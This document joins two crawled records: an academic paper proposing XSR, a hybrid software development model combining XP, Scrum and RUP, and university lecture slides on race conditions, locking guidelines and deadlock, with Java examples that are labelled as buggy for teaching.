24010, null], [24010, 25006, null], [25006, 26843, null], [26843, 31128, null], [31128, 31903, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 31903, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 31903, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 31903, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 31903, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 31903, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 31903, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 31903, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 31903, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 31903, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 31903, null]], "pdf_page_numbers": [[0, 3767, 1], [3767, 6479, 2], [6479, 10505, 3], [10505, 13241, 4], [13241, 13639, 5], [13639, 13679, 6], [13679, 13723, 7], [13723, 14974, 8], [14974, 16340, 9], [16340, 17323, 10], [17323, 17853, 11], [17853, 19479, 12], [19479, 21082, 13], [21082, 24010, 14], [24010, 25006, 15], [25006, 26843, 16], [26843, 31128, 17], [31128, 31903, 18]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 31903, 0.17816]]}
olmocr_science_pdfs
2024-12-02
2024-12-02
c98dbecda554c5294641a800e7e4ab8c00612ee0
XSR: Novel Hybrid Software Development Model (Integrating XP, Scrum & RUP) Gul Ahmad, Tariq Rahim Soomro, Mohammad Nawaz Brohi Abstract— Software industries are progressively adopting the agile development practices of customized models such as Extreme Programming (XP) or Scrum or Rational Unified Process (RUP). Scrum and Extreme Programming (XP) are frequently used agile models, whereas Rational Unified Process (RUP) is one popular classic plan driven software development methodology. Both agile and plan driven models have their own merits & demerits such as XP has good engineering practices, team collaboration and on the other hand weak documentation, poor performance in medium & large scale projects. Scrum is based on project management practices. RUP model has some limitations such as impractical for small and fast paced projects, tendency to be over budgeted, condemn rapid changes in requirements. This research paper based on propose novel hybrid framework XSR by combining strengths of Scrum, XP and RUP by suppressing their limitations to produce high quality software. Index Terms— eXtreme Programming (XP), Scrum, Rational Unified Process (RUP), XP Scrum RUP (XSR) I. INTRODUCTION Extreme Programming (XP) is the most highly adopted agile practice and widely used in various organizations and software industry throughout the world. XP is simple & lightweight agile methodology for small scale & simple projects. XP believe on basic five working codes/values are communication, simplicity, feedback, courage and respect. XP is designed for small teams who need to work in a fast & quick software development environment, where requirements are changing frequently & exceptionally. XP works by bringing the whole team together in the presence of simple practices, with continuous feedback to enable the project team to see their position. XP is resource oriented rather than process centric. It’s follows an iterative and incremental approach; highly focusing on regular customer collaboration, embracing changes anytime, anywhere. Releases are delivered via small iterations, minimum error level. It’s also prioritizing the project artifacts and work on the task with high level priority. Handling the rapidly changing business requirements is main capability of XP. Due to direct customer involvement by giving constant feedback, XP has a positive impact on the business requirements, which producing high quality software according to customer desires. XP main strengths are include rapid development, low cost, high quality, result oriented development, small bug rates and embracing of rapid changes at any stage with minimum possible expenses. Common XP practices are include Planning Game, Small Releases, Metaphor, Simple Design, Tests, Refactoring, Pair Programming, Collective Ownership, Continuous Integration, 40-hour Week On-site customer and Coding Standards [1][2][3][4][5][6][21][24]. Scrum is a popular and widely adopted agile software development technique/model. Scrum is focus on project leadership and some aspects of requirements management, which is derived from best business practices in terms of productivity and quality. Scrum is a lightweight framework and is suitable to integrate with other iterative incremental models work on complicated projects. Scrum also has the ability to promote the existing business practices, which increase the quality as well as productivity of the projects. The iteration in Scrum is called sprint, which is more suitable for distributed teams of project initialization. Sprint is (2-6 week) time boxed or iterations. In some projects requirements are unclear & ambiguous in this situation Scrum development methodology is the best practice. Scrum speeding up development, objectives alignment, creative business culture, promote share-holder value & promoting individual improvement. Scrum helps to a software providers & vendors to compete with others to achieve the market value. The main objective of Scrum development to manage the development processes of system with such practice to deliver high quality software. Scrum promoting self-organizing teams and helps to provide productive flexible working environment. It is an incremental and iterative process technique that conducting continuous communication meetings which are highlighting the overlapping areas, module integration & data validation. The sprint or time box length in scrum usually from two to four weeks which can helps to finish the project within few months [3][7][8][9][10][20][23]. The Rational Unified Process (RUP) is an incremental, iterative and plan oriented architectural framework, focusing on standard software engineering principles. It is a step by step process methodology to promote qualitative object oriented software projects. RUP is a conventional & plan driven approach, which provides a very clear structured and formalized flow for software development. RUP based on planning centric process, extensive system analysis, proper design principles, standard coding process and extended level of documentation. RUP are suitable for large scale projects due to extensive documentation, case driven, predictability, best assurance, tailoring and tool support processing. RUP can also be customized and tailored... according to business requirements in mid-level projects [11][12][20][21]. The core idea behind this study is to propose a hybrid model (XSR) to combine the best practices & depressed limitations of existing agile models (XP, Scrum & RUP) to increase the capability of software industry to produce high quality in the software projects on time and within budget. XSR (XP, Scrum & RUP) model is to develop integration among eXtreme Programming (XP), Scrum & Rational Unified Process (RUP), while the focus of XP to provide very effective engineering practices, Scrum main goal to provide effective framework for management of the project and Rational Unified Process (RUP) is a conventional model, which believe on documentation and plan oriented. This integrated hybrid model of XP, Scrum and RUP will combine their best practices to achieve the goal of satisfying business and customer needs. The resultant outcome of this integration will be a rich productive and an efficient model, i.e., XSR that having best engineering & management practices of software engineering and more productive [13][14][15][22][25]. The proposed novice hybrid model i.e. XSR will be the collaborative container for combining the best practices and strengths of XP, Scrum and RUP, such as XP providing the best software engineering practices, Scrum offering a best project management features and RUP directions are business objectives accomplishment and customer satisfactions. The proposed hybrid model is to combine the good features of XP, Scrum and RUP and to decrease their pitfalls to provide a qualitative software development model to ensure business needs and embrace changes smartly. XSR (XP, Scrum and RUP) is intended to embed the management features from Scrum, coding and standard strengths from XP and business objective accomplishment & customer satisfactions from RUP. The main logic behind creating XSR model is to have a development methodology that has the capabilities to produce high quality products and low bug rate [14][25]. This paper is organized as follows: section 2 will discuss, why do we need hybrid model XSR? Section 3 will explore proposed hybrid model XSR; and finally section 4 will conclude with discussion along with future direction. II. WHY DO WE NEED XSR? Different agile models are experienced and practiced by integrating them with plan driven conventional software development models to increase the throughputs of both agile and classic models, while trying to suppress the pitfalls and limitations of each approach. Integration of Scrum, XP and RUP methodologies is a good combination to enrich the practices of both pompous and agile approaches. XP focus on engineering practices & coding standards, but lacks in project management expertise; XP practices can apply in small projects due fully dependent on customer, which increase the project fail risks. On the other hand Scrum is focusing on project management practices and silent about the software engineering processes. Scrum required sound technical qualified resources to build the team. RUP model also ring some risks & limitations, such as over budgeting, rapid changes of requirements are getting slow response, suitable only for medium & large scale projects rather than fast paced and small scale projects. RUP model major pitfalls are that they are not providing proper guidelines for implementation of projects and leaving entirely on the user end. The best practices of Scrum and XP are to embrace rapid changes in requirements intended to add into XSR model, while RUP getting fail in adaptation to frequent changes in requirements due to based on extensive system requirements documentation. The primary potency of RUP model is to meet business requirements & customer satisfaction by delivering software with high quality and providing adequate planning of the system. Considering the context about XP, Scrum and RUP model, the research problem becomes “Need to propose a hybrid model by integrating the strengths of XP, Scrum & RUP as well as narrower the flaws to build a quality software development model to adapt creeping requirements quickly with planning & documentation” [13][15][16][3][22]. XSR is not a methodology, but it is a generalized framework from which anyone can choose interested ideas, which might suitable for various organization or project [14]. XSR also has some extra structure that is not in some of agile models. Some interested points that trying to proof that framework is worthy: [18] - XSR is an integrated framework of chairing agile models, combining together a set of gratuitous strengths such as Scrum, XP & the Unified Process. - Existing agile models are mostly lacking of having practices about the full life cycle. For instance Scrum main focus on management oriented, rather than architecture centric. XSR is a hybrid framework cleans heading strengths from full lifecycle. - XSR a detonated recognition that mostly all enterprise level projects go through startup and deployment phases, which inception & transition phases respectively. - XSR believed on unbranded nomenclature such as “sprint” rather recommending common language words that is easy to understand instead of sticking with one’s methodology preferences. XSR is not means to replace any existing agile practice but to simplify & promote them. Instead of saying that “I am working on project using Scrum, somehow XP, somewhere RUP practices etc.”, simply can say that we are using the XSR framework. For instance, if a team now doing Scrum, they could still say that they are following the XSR framework. Using agile capabilities one can crazy about speedup or quality, or about additional scaling process; XSR could help in these ideas, but only that it makes sense for project. In abstract, XSR provides a comprehensive guidance with unbranded ideas that go beyond traditional agile models that help organization to deal enterprise in informal projects [18]. III. PROPOSED HYBRID SOFTWARE DEVELOPMENT MODEL XSR As described above agile practices are not well tested for large scale projects, but analysts are claiming that complex & large size project can take advantages of them. To overcome this issue it is to build a hybrid model by combining leading agile methodologies, such as XP, Scrum and RUP. The XSR... hybrid framework support to and extended the disciplines and principles of the agile manifesto. Project teams that are using iterative or incremental or agile processes have to produce high quality software, with higher return on investment (ROI), stakeholder satisfaction, and rapid delivery as compared to a conventional process model or an ad-hoc approach. By using some techniques such as refactoring, continuous integration (CI), test-first development (TFD), and developer regression testing (DRT) high quality can achieve. Return on investment could increase by focusing primary value activities with prioritize order, self-management, automation of regular activities, close collaboration etc. [14][18]. XSR is the conceptualize model of many techniques and principles from the three most popular agile methodologies i.e. XP, Scrum & RUP. Mostly XSR practices are taken from the agile community, such as daily meetings, continuous integration (CI), and refactoring. The XSR is hybrid process model/framework, which could adopt and tailors techniques & practices from a different of sources. The XSR model/framework is integrated form of the below methods: [18] A. Extreme Programming XSR inherited the strategies of XP, but not limited collective ownership code, refactoring, TDD (test driven development), CI (continuous configuration), and others. B. Scrum Scrum primary focus is on management of requirements, guidelines and leadership. XSR tailors many ideal things from Scrum and ignoring many of the scrum practices as well. XSR adopting the idea of prioritize items, product ownership representative role, and a working potential deliverable is expected from each iteration; however, XSR denounce some Scrum ideas and terminologies, such as scrum master no longer in use called as product owner, no speedy sprints etc. C. Unified Process (UP) XSR process framework is tailoring many ideas and strategies agile unified processes such as Open Unified Process (OUP) and Agile Unified Process (AUP). These strategies include explicit phase & lightweight milestones and also inheriting the features of providing architecture and eliminating risks in initial iteration, as shown in Figure-1 below. Fig. 1 Comparison of XP, Scrum & RUP in XSR XSR provides a proper lifecycle of the project such as initialization, construction and releasing to end user. XSR is recommending that each iteration is not same, but can evolve depends on change in project requirements along the lifecycle. XSR believe in simplicity therefore distribute the project into phases, which each of them having lightweight milestones to focus on doing rights on right time with proper direction. These phases include initial visioning, architectural modeling, risk management, and deployment planning. This life cycle has several critical features: 1) Delivery Lifecycle XSR lifecycle extends of Scrum lifecycle, which are tends to show explicitly the complete delivery lifecycle from the initialization of a project to the release into production. 2) Explicit Phases The XSR lifecycle is consist of three phases such as inception phase, construction phase, and transition phase, reflecting the agile C3 (Coordinate Collaborate Conclude) cycle, as shown in Figure-2 below. [18] Fig. 2: XSR lifecycle 3) Explicit Milestone XSR framework contains a variety of milestones, which are playing an important role in governance and eliminating risks in projects. Let’s overview the XSR phases to better understand the contents of the XSR process framework [18]. a) The Inception Phase Plan driven models investing a big amount of effort and time to up front their projects plan. Other hand agile methodologies discouraging much up front detail, while a bit is address about the business requirements with time frame & budget constraints. Agile approaches suggest very small amount of effort and time to be invested in project upfront planning. The agile catchword can be as “let’s just get started and will determine where we are going as we go”. Some agile models are recommending a very short planning iteration that is called “Sprint 0” in Scrum, and the “Planning Game” in XP. Planning Game usual length is around 3.9 weeks. XSR hybrid model introducing the need trace the right direction before moving ahead such as for initialization to spent a few days and a few weeks. Table-1 shows inception phase goals. Table-1 <table> <thead> <tr> <th>Inception Phase Goals</th> </tr> </thead> <tbody> <tr> <td>- Define the project vision</td> </tr> <tr> <td>- Agreement with stakeholders according to project plan, and requirements</td> </tr> <tr> <td>- Building of team</td> </tr> <tr> <td>- Secure project budget</td> </tr> <tr> <td>- Clear the risks</td> </tr> <tr> <td>- Define technical strategy initially</td> </tr> </tbody> </table> b) The Construction Phase In XSR construction phase is the timeline in which working software is built and required functionality are completed. This timeline is break up into sub timelines or time-boxes, which are called iterations. All iteration should be of same period for the same project, which is typically of 2-4 weeks duration. Output of each iteration is potential... deliverable solution with proper testing. In this phase sufficient functionality are delivered which can justify the transition cost or also called minimum marketable release (MMR) which accepted by shareholder [18]. Table-2 shows construction phase goals. Table-2 <table> <thead> <tr> <th>Construction Phase Iterations Goals</th> </tr> </thead> <tbody> <tr> <td>- Develop a potential solution</td> </tr> <tr> <td>- Focus rapid changes stakeholder requirements</td> </tr> <tr> <td>- Address deployable releases</td> </tr> <tr> <td>- Quality continuous improvement</td> </tr> <tr> <td>- Define major risks</td> </tr> </tbody> </table> c) The Transition Phase XSR model transition phase focuses on deployment & delivering the working software into marketplace. The duration for transition phase is depends on project nature & size as well the business requirements. Transition of external release is more harder then internal release. For external system high level testing are required before release to marketplace with many alpha & beta tests. The result of the end of transition phase is completely stakeholders accepted & deployed system [18]. Table-3 shows transition phase goals and Table-4 shows other ongoing goals. Table-3 <table> <thead> <tr> <th>Transition Phase Goals</th> </tr> </thead> <tbody> <tr> <td>- Make sure the deliverable is ready for transition</td> </tr> <tr> <td>- Make sure the users are ready to get the solution</td> </tr> <tr> <td>- Solution deployment on production</td> </tr> </tbody> </table> Table-4 <table> <thead> <tr> <th>Other Ongoing Goals</th> </tr> </thead> <tbody> <tr> <td>- Complete the project mission</td> </tr> <tr> <td>- Continuous growth of the team skills</td> </tr> <tr> <td>- Extension of infrastructure</td> </tr> <tr> <td>- Improvement of working process and environment</td> </tr> <tr> <td>- Utilize the infrastructure</td> </tr> </tbody> </table> IV. DISCUSSION AND FUTURE WORK This research primary aim is to get such generic software development model to develop qualitative software that should be on time, meet customer needs and boost team performance. XSR framework combining the strengths of the three popular agile models such as XP, RUP and Scrum while suppressing their pitfalls. XP will provide software engineering practices such as user stories, pair programming, and test driven activities. Scrum is popular for managerial techniques due to observations; roles based approach and artifacts throughout lifecycle of project development. RUP will help in providing structured, skeleton and formalized guidelines throughout lifecycle and also help in support of XP practices via its philosophy [1] . The proposed XSR framework also need proper testing & review like other customized agile models XP, Scrum, Lean, Kanban, and Crystal clear etc. in real practical environment to promote it. Various industries as well individual professionals are working, on that way to improve the practices of XP, Scrum and RUP to manage software development and delivery of projects. My suggestions lets help us in promoting this new hybrid framework further by evaluating it in various sized and types of projects and organizations in different business environments. XSR practical implementation can address its shortcomings & flaws and can improve it by sharing ideas of practical experiences. Some recommendations for future work for extension of the XSR framework are: [19] - XSR framework can be further integrated with other models and standards for getting best solution. - More case studies & survey with agile as well business professionals involved in variety of projects and business could improve XSR framework. - Real implementation of XSR framework could support the improvement in the hybrid model. The real applications of XSR hybrid model would take time, because every practitioner is cautious to implement a virgin model or practice that has not proved yet. Best approaches and practices are gradually, but continuously improved by testing and evidence. The breadcrumb of the XSR framework will only be realized after more application in real environment [19]. REFERENCES Dr. Tariq Rahim Soomro Ph.D. in Computer Applications (China), M.Sc in Computer Science (Pakistan), B.Sc (Hons) in Computer Science (Pakistan), Senior Member IEEE USA, Senior Member Computer Society IEEE USA, Senior Member Geoscience & Remote Sensing Society IEEE USA, Senior Member IACSIT, Member Project Management Institute (PMI), Life Member Computer Society of Pakistan (CSP), Life Member Sindhi Graduates Association (SGA) Pakistan, Global Member Internet Society (ISOC) USA, GIS, IDNS, DSN, Distance Education, E-Commerce, Multimedia, Web, Internet, UNICODE, WAP, P2P, Bioinformatics, Telemedicine, Networking, Databases, Programming, Writing Technical Articles. Dr. M.N.Brohi PhD in Information Technology from Preston University, M.Phil in computer sciences from North East University of Science and Technology, Shenyang, China. M.Sc in Computer Sciences from Quaid-e-Azam University Pakistan, mnbrohi@szabist.ac.ae
{"Source-Url": "http://www.ijsce.org/wp-content/uploads/papers/v4i2/B2228054214.pdf", "len_cl100k_base": 4368, "olmocr-version": "0.1.50", "pdf-total-pages": 5, "total-fallback-pages": 0, "total-input-tokens": 19001, "total-output-tokens": 5857, "length": "2e12", "weborganizer": {"__label__adult": 0.00035500526428222656, "__label__art_design": 0.00026607513427734375, "__label__crime_law": 0.00028228759765625, "__label__education_jobs": 0.001346588134765625, "__label__entertainment": 4.035234451293945e-05, "__label__fashion_beauty": 0.00014650821685791016, "__label__finance_business": 0.0005297660827636719, "__label__food_dining": 0.00036072731018066406, "__label__games": 0.0004031658172607422, "__label__hardware": 0.0004727840423583984, "__label__health": 0.00040531158447265625, "__label__history": 0.00016987323760986328, "__label__home_hobbies": 7.128715515136719e-05, "__label__industrial": 0.0003082752227783203, "__label__literature": 0.00019502639770507812, "__label__politics": 0.0002161264419555664, "__label__religion": 0.0003666877746582031, "__label__science_tech": 0.0032825469970703125, "__label__social_life": 8.469820022583008e-05, "__label__software": 0.0035152435302734375, "__label__software_dev": 0.986328125, "__label__sports_fitness": 0.00031566619873046875, "__label__transportation": 0.00040531158447265625, "__label__travel": 0.00019037723541259768}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 26028, 0.02238]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 26028, 0.05342]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 26028, 0.91791]], "google_gemma-3-12b-it_contains_pii": [[0, 5297, false], [5297, 11627, null], [11627, 16698, null], [16698, 23048, null], [23048, 26028, null]], "google_gemma-3-12b-it_is_public_document": [[0, 5297, true], [5297, 11627, null], [11627, 16698, null], [16698, 23048, null], [23048, 26028, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 26028, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 26028, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 26028, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 26028, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 26028, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 26028, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 26028, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 26028, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 26028, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 26028, null]], "pdf_page_numbers": [[0, 5297, 1], [5297, 11627, 2], [11627, 16698, 3], [16698, 23048, 4], [23048, 26028, 5]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 26028, 0.24324]]}
olmocr_science_pdfs
2024-11-28
2024-11-28
a86fad53b3ba32841a9f8fb24e9889edac7148e2
CSE 332: Data Structures & Parallelism Lecture 18: Race Conditions & Deadlock Ruth Anderson Autumn 2018 Outline Done: - The semantics of locks - Locks in Java - Using locks for mutual exclusion: bank-account example This lecture: - Race Conditions: Data Races vs. Bad Interleavings - Guidelines/idioms for shared-memory and using locks correctly - Coarse-grained vs. fine-grained (for locks and critical sections) - Deadlock Race Conditions A race condition occurs when the computation result depends on scheduling (how threads are interleaved) – If T1 and T2 happened to get scheduled in a certain way, things go wrong – We, as programmers, cannot control scheduling of threads; – Thus we need to write programs that work independent of scheduling Race conditions are bugs that exist only due to concurrency – No interleaved scheduling problems with only 1 thread! Typically, problem is that some intermediate state can be seen by another thread; screws up other thread – Consider a ‘partial’ insert in a linked list; say, a new node has been added to the end, but ‘back’ and ‘count’ haven’t been updated Race Conditions: Data Races vs. Bad Interleavings We will make a big distinction between: - data races - bad interleavings - Both are kinds of race-condition bugs - Confusion often results from not distinguishing these or using the ambiguous “race condition” to mean only one Data Races (briefly) - A data race is a specific type of race condition that can happen in 2 ways: - Two different threads potentially write a variable at the same time - One thread potentially writes a variable while another reads the variable - Not a race: simultaneous reads provide no errors - ‘Potentially’ is important - We claim the code itself has a data race independent of any particular actual execution - Data races are bad, but we can still have a race condition, and bad behavior, when no data races are present…through bad interleavings (what we will discuss now). Stack Example (pseudocode) class Stack<E> { private E[] array = (E[]) new Object[SIZE]; private int index = -1; synchronized boolean isEmpty() { return index == -1; } synchronized void push(E val) { array[++index] = val; } synchronized E pop() { if (isEmpty()) throw new StackEmptyException(); return array[index--]; } } Example of a Race Condition, but not a Data Race class Stack<E> { ... // state used by isEmpty, push, pop synchronized boolean isEmpty() { ... } synchronized void push(E val) { ... } synchronized E pop() { if (isEmpty()) throw new StackEmptyException(); ... } E peek() { // this is wrong E ans = pop(); push(ans); return ans; } } peek, sequentially speaking - In a sequential world, this code is of questionable style, but unquestionably correct - The “algorithm” is the only way to write a peek helper method if all you had was this interface: ```java interface Stack<E> { boolean isEmpty(); void push(E val); E pop(); } class C { static <E> E myPeek(Stack<E> s){ ??? } } ``` Problems with \texttt{peek} - \texttt{peek} has no \textit{overall} effect on the shared data - It is a “reader” not a “writer” - State should be the same after it executes as before - But the way it is implemented creates an inconsistent \textit{intermediate state} - Calls to \texttt{push} and \texttt{pop} are synchronized - So there are no \textit{data races} on the underlying array/index - There is still a \textit{race condition} though - This intermediate state should not be exposed - Leads to several \textit{bad interleavings} Example 1: peek and isEmpty - **Property we want**: If there has been a push (and no pop), then isEmpty should return false - With peek as written, property can be violated – how? ```java Thread 1 (peek) E ans = pop(); push(ans); return ans; Thread 2 push(x) boolean b = isEmpty() ``` **Example 2: peek and push** - **Property we want:** Values are returned from `pop` in LIFO order. - With `peek` as written, property can be violated – how? ```python ans = pop(); push(ans); return ans; push(x) push(y) e = pop() ``` Example 3: peek and pop - **Property we want**: Values are returned from `pop` in LIFO order - With `peek` as written, property can be violated – how? ```plaintext Thread 1 (peek) E ans = pop(); push(ans); return ans; Thread 2 push(x) push(y) E e = pop() ``` Example 4: peek and peek - **Property we want:** `peek` doesn’t throw an exception unless stack is empty - With `peek` as written, property can be violated – how? ``` Thread 1 (peek) E ans = pop(); push(ans); return ans; Thread 2 (peek) E ans = pop(); push(ans); return ans; ``` The fix • In short, **peek** needs synchronization to disallow interleavings – The key is to make a *larger critical section* • That intermediate state of **peek** needs to be protected – Use re-entrant locks; will allow calls to **push** and **pop** – Code on right is example of a **peek** external to the **Stack** class ```java public class Stack<E> { ... synchronized E peek() { E ans = pop(); push(ans); return ans; } } ``` ```java public class C { <E> E myPeek(Stack<E> s) { synchronized (s) { synchronized (s) { E ans = s.pop(); s.push(ans); return ans; } } } } ``` The wrong “fix” • **Focus so far**: problems from `peek` doing writes that lead to an incorrect intermediate state • **Tempting but wrong**: If an implementation of `peek` (or `isEmpty`) does not write anything, then maybe we can skip the synchronization? • Does not work due to **data races** with `push` and `pop`... class Stack<E> { private E[] array = (E[])new Object[SIZE]; private int index = -1; boolean isEmpty() { // unsynchronized: wrong?! return index == -1; } synchronized void push(E val) { array[++index] = val; } synchronized E pop() { return array[index--]; } E peek() { // unsynchronized: wrong! return array[index]; } } **Why wrong?** - It *looks like* `isEmpty` and `peek` can “get away with this” since `push` and `pop` adjust the state “in one tiny step” - But this code is still *wrong* and depends on language-implementation details you cannot assume - Even “tiny steps” may require multiple steps in the implementation: `array[++index] = val` probably takes at least two steps - Code has a *data race*, allowing very strange behavior - Compiler optimizations may break it in ways you had not anticipated - See Grossman notes for more details - Moral: Do not introduce a *data race*, even if every interleaving you can think of is correct The distinction The (poor) term “race condition” can refer to two different things resulting from lack of synchronization: 1. **Data races**: Simultaneous read/write or write/write of the same memory location - (for mortals) **always** an error, due to compiler & hardware - Original *peek* example has no data races 2. **Bad interleavings**: Despite lack of data races, exposing bad intermediate state - “Bad” depends on your specification - Original *peek* had several bad interleavings Getting it right Avoiding race conditions on shared resources is difficult - What ‘seems fine’ in a sequential world can get you into trouble when multiple threads are involved - Decades of bugs have led to some conventional wisdom: general techniques that are known to work Next we discuss this conventional wisdom! - Parts paraphrased from “Java Concurrency in Practice” - Chapter 2 (rest of book more advanced) - But none of this is specific to Java or a particular book! - May be hard to appreciate in beginning, but come back to these guidelines over the years! 3 choices For every memory location (e.g., object field) in your program, you must obey at least one of the following: 1. Thread-local: Do not use the location in > 1 thread 2. Immutable: Do not write to the memory location 3. Shared-and-mutable: Use synchronization to control access to the location 1. Thread-local Whenever possible, do not share resources - Easier to have each thread have its own **thread-local copy** of a resource than to have one with shared updates - This is correct only if threads do not need to communicate through the resource - That is, multiple copies are a correct approach - Example: `Random` objects - Note: Because each call-stack is thread-local, never need to synchronize on local variables _In typical concurrent programs, the vast majority of objects should be thread-local: shared-memory should be rare – minimize it_ 2. Immutable Whenever possible, do not update objects - Make new objects instead! - One of the key tenets of *functional programming* (see CSE 341) - Generally helpful to avoid *side-effects* - Much more helpful in a concurrent setting - If a location is only read, never written, then no synchronization is necessary! - Simultaneous reads are *not* races and *not* a problem *In practice, programmers usually over-use mutation – minimize it* 3. The rest: Keep it synchronized After minimizing the amount of memory that is (1) thread-shared and (2) mutable, we need guidelines for how to use locks to keep other data consistent **Guideline #0:** No data races - *Never allow two threads to read/write or write/write the same location at the same time* (use locks!) - Even if it ‘seems safe’ **Necessary:** - a Java or C program with a data race is almost always wrong *But Not sufficient:* Our peek example had no data races, and it’s still wrong… Consistent Locking **Guideline #1:** Use consistent locking - For each location needing synchronization, have a lock that is *always* held when reading or writing the location - We say the lock *guards* the location - The same lock can (and often should) guard multiple locations (ex. multiple fields in a class) - Clearly document the guard for each location - In Java, often the guard is the object containing the location - `this` inside the object’s methods - But also often guard a larger structure with one lock to ensure mutual exclusion on the structure Consistent Locking (continued) • The mapping from locations to guarding locks is conceptual – Must be enforced by you as the programmer • It partitions the shared-and-mutable locations into “which lock” Consistent locking is: • Not sufficient: It prevents all data races but still allows bad interleavings – Our peek example used consistent locking, but still had exposed intermediate states (and allowed potential bad interleavings) • (Aside) Not necessary: You could have different locking protocols for different phases of your program as long as all threads are coordinated moving from one phase to next. eg. at start of program data structure is being updated (needs locks), later it is not modified so can be read simultaneous (no locks). Lock granularity Coarse-grained: Fewer locks, i.e., more objects per lock – Example: One lock for entire data structure (e.g., array) – Example: One lock for all bank accounts Fine-grained: More locks, i.e., fewer objects per lock – Example: One lock per data element (e.g., array index) – Example: One lock per bank account “Coarse-grained vs. fine-grained” is really a continuum Trade-offs Coarse-grained advantages: - Simpler to implement - Faster/easier to implement operations that access multiple locations (because all guarded by the same lock) - Much easier for operations that modify data-structure shape Fine-grained advantages: - More simultaneous access (performance when coarse-grained would lead to unnecessary blocking) - Can make multi-node operations more difficult: say, rotations in an AVL tree Guideline #2: Start with coarse-grained (simpler) and move to fine-grained (performance) only if contention on the coarser locks becomes an issue. Example: Separate Chaining Hashtable - Coarse-grained: One lock for entire hashtable - Fine-grained: One lock for each bucket Which supports more concurrency for insert and lookup? Which makes implementing resize easier? - How would you do it? If a hashtable has a numElements field, maintaining it will destroy the benefits of using separate locks for each bucket, why? **Critical-section granularity** A second, orthogonal granularity issue is critical-section size – How much work to do while holding lock(s)? If critical sections run for too long? – If critical sections are too short? – Example 1: Critical-section granularity Suppose we want to change the value for a key in a hashtable without removing it from the table - Assume lock guards the whole table - expensive() takes in the old value, and computes a new one, but takes a long time ```java synchronized(lock) { v1 = table.lookup(k); v2 = expensive(v1); table.remove(k); table.insert(k,v2); } ``` Example 2: Critical-section granularity Suppose we want to change the value for a key in a hashtable without removing it from the table - Assume lock guards the whole table ```java synchronized (lock) { v1 = table.lookup(k); } v2 = expensive(v1); synchronized (lock) { table.remove(k); table.insert(k, v2); } ``` Example 3: Critical-section granularity Suppose we want to change the value for a key in a hashtable without removing it from the table - Assume lock guards the whole table ```java done = false; while (!done) { synchronized (lock) { v1 = table.lookup(k); } v2 = expensive(v1); synchronized (lock) { if (table.lookup(k) == v1) { done = true; // I can exit the loop! table.remove(k); table.insert(k, v2); } } } ``` Atomicity An operation is *atomic* if no other thread can see it partly executed – Atomic as in “appears indivisible” – Typically want ADT operations atomic, even to other threads running operations on the same ADT **Guideline #4:** *Think in terms of what operations need to be atomic* – Make critical sections just long enough to preserve atomicity – *Then* design the locking protocol to implement the critical sections correctly *That is:* *Think about atomicity first and locks second* Don’t roll your own • In “real life”, it is unusual to have to write your own data structure from scratch – Implementations provided in standard libraries – Point of CSE332 is to understand the key trade-offs, abstractions, and analysis of such implementations • Especially true for concurrent data structures – Far too difficult to provide fine-grained synchronization without race conditions – Standard thread-safe libraries like ConcurrentHashMap written by world experts Guideline #5: Use built-in libraries whenever they meet your needs Deadlock Motivating Deadlock Issues Consider a method to transfer money between bank accounts ```java class BankAccount { ... synchronized void withdraw(int amt) {...} synchronized void deposit(int amt) {...} synchronized void transferTo(int amt, BankAccount a) { this.withdraw(amt); a.deposit(amt); } } ``` Potential problems? Motivating Deadlock Issues Consider a method to transfer money between bank accounts ```java class BankAccount { ... synchronized void withdraw(int amt) {...} synchronized void deposit(int amt) {...} synchronized void transferTo(int amt, BankAccount a) { this.withdraw(amt); a.deposit(amt); } } ``` Notice during call to `a.deposit`, thread holds two locks - Need to investigate when this may be a problem The Deadlock Suppose $x$ and $y$ are static fields holding accounts Thread 1: $x\.transferTo(1, y)$ - acquire lock for $x$ - do withdraw from $x$ - block on lock for $y$ Thread 2: $y\.transferTo(1, x)$ - acquire lock for $y$ - do withdraw from $y$ - block on lock for $x$ **Ex: The Dining Philosophers** - 5 philosophers go out to dinner together at an Italian restaurant - Sit at a round table; one fork per setting - When the spaghetti comes, each philosopher proceeds to grab their right fork, then their left fork, then eats - ‘Locking’ for each fork results in a **deadlock** Deadlock, in general A deadlock occurs when there are threads $T_1, \ldots, T_n$ such that: - For $i=1,\ldots,n-1$, $T_i$ is waiting for a resource held by $T_{i+1}$ - $T_n$ is waiting for a resource held by $T_1$ In other words, there is a cycle of waiting - Can formalize as a graph of 